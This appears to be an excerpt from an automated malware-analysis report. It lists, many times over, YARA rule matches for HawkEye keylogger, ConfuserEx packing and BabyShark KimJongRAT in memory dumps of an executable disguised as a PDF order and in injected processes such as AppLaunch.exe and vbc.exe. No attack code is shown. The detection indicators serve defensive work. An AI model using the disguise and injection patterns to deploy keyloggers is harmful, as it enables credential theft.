              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 18.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.7f31990.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.9480000.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.94d834a.4.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.9480000.3.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.3.AppLaunch.exe.875dbda.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.2.AppLaunch.exe.7f31990.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 18.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.2.AppLaunch.exe.7e95950.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.9480345.5.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
